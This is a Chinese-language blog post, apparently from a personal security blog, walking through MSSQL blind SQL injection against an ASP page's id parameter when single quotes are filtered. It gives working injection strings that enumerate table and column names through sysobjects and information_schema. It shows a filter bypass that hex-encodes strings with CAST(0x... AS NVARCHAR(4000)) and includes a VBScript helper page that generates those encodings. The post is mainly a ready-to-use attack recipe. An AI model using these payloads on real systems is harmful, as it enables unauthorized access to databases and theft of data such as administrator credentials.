在过滤单引号的条件下进行mssql盲注

38930721

最近碰到一个情况,在无报错的情况下,对未知复杂表名进行注入,且过滤了单引号和常见小写的注入关键词。当时搞的时候很是头疼,于是在解决之后很想与大家分享一下,没啥高深的技术,大牛们见笑了。

为了方便看,我先忽略掉过滤了单引号这个条件,后面会详细说明如何突破。

=======================================================================

1.mssql盲注

x.asp?id=1 And (select count(*) from sysobjects where name in (select top 1 name from sysobjects where xtype=’u’) And ascii(substring(name,1,1))>80)=1

这样可以依次猜出第一张表名,假设这里猜出的结果是table1

然后

x.asp?id=1 And (select count(*) from sysobjects where name in (select top 1 name from sysobjects where xtype=’u’ And name not in (‘table1′)) And ascii(substring(name,1,1))>80)=1

这里猜出第二表,假设是table2

再然后

x.asp?id=1 And (select count(*) from sysobjects where name in (select top 1 name from sysobjects where xtype=’u’ And name not in (‘table1′) And name not in (‘table2′)) And ascii(substring(name,1,1))>80)=1

这里猜出第三章表,假设是……

直到我们猜出了复杂的管理员的表,这里假设是admin_X1y4s

然后我们继续猜字段

这里说明一下,现在的关于盲注的文章基本上就是oldjun的那篇,那篇在叙述猜字段的时候是这样写的

x.asp?id=1 and (select count(*) from database.dbo.syscolumns where name in (select top 1 name from database_db.dbo.syscolumns where id=object_id(‘database.dbo.table’)) and ascii(substring(name,1,1))>90)=1

但是我在实际测试的时候这条语句并不成功,然后改造了下:

x.asp?id=1 And Ascii(substring((select top 1 column_name from information_schema.columns where table_name=’admin_X1y4s’),1,1))>80

经过上面这条,我们猜到了第一个字段,假设是id,那么再

x.asp?id=1 And Ascii(substring((select top 1 column_name from information_schema.columns where column_name<>(‘id’) And table_name=’admin_x1y4s’),1,1))>80

就可以猜出第二条字段名,依次…………

既然表名和字段名都出来了,猜具体数据的过程我在这里就不叙述了。

==============================================================================

2.如何绕过单引号

在上面的过程中,会使用到单引号,对于单字符,可以直接使用0xffff的形式,但是对于字符串却不行,这个让自己头疼了很久,然后经过漫漫测试,发现可以利用Cast函数进行转换。

举个例子:

当 盲注语句是 and (select count(*) from database.dbo.sysobjects where name in (select top 1 name from database.dbo.sysobjects where xtype=’u’ and name not in (‘table1′)) and ascii(substring(name,1,1))>90)=1

于是:【table1】转换成【CAST(0x7400610062006C0065003100 AS NVARCHAR(4000))】 (就是转换成16进制)

然后就可以使用【CAST(0x7400610062006C0065003100 AS NVARCHAR(4000))】代替【’table1′】

【u】同理。

为了方便大家,下面是具体工具代码我贴出来。

<title>3EST注入辅助转换工具</title>
<script language=vbs>
sub sqlencode()
Dim strTest
strTest = form1.text1.value
myHex = Str2Hex(strTest)
document.write “<pre>CAST(0x”&myhex&” AS NVARCHAR(4000))</pre>”
end sub
Function Str2Hex(ByVal strHex)
Dim sHex
For i = 1 To Len(strHex)
sHex = sHex & Hex(Asc(Mid(strHex,i,1)))&”00″
Next
Str2Hex = sHex
End Function
</script>
<form name=form1 method=”post”>
<p>无技术含量,就是一个16进制转换器,仅仅为了大家方便。</p>
<input type=text name=text1 value=”table1″ size=100><input type=submit onclick=sqlencode()
value=”给我转”>
<br>
</form>

原创文章转载请注明:转载自 七行者博客

本文固定链接: http://www.qxzxp.com/4293.html